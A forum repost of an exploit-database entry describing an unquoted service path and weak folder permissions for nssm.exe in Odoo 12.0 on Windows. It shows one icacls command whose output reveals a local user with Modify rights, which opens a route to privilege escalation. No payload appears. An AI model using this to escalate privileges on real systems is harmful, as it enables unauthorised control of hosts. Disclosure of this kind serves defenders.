This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 233 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path # Exploit Author: 1F98D # Vendor Homepage: https://www.odoo.com/ # Software Link: https://nightly.odoo.com/12.0/nightly/windows/odoo_12.0.20190101.exe # Tested Version: 12.0.20190101 # Tested on OS: Windows # Step to discover Unquoted Service Path: C:\> icacls "C:\Program Files (x86)\Odoo 12.0\nssm" C:\Program Files (x86)\Odoo 12.0\nssm pc-1\user-1:(OI)(CI)(M) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) Link to comment Share on other sites More sharing options...
Recommended Posts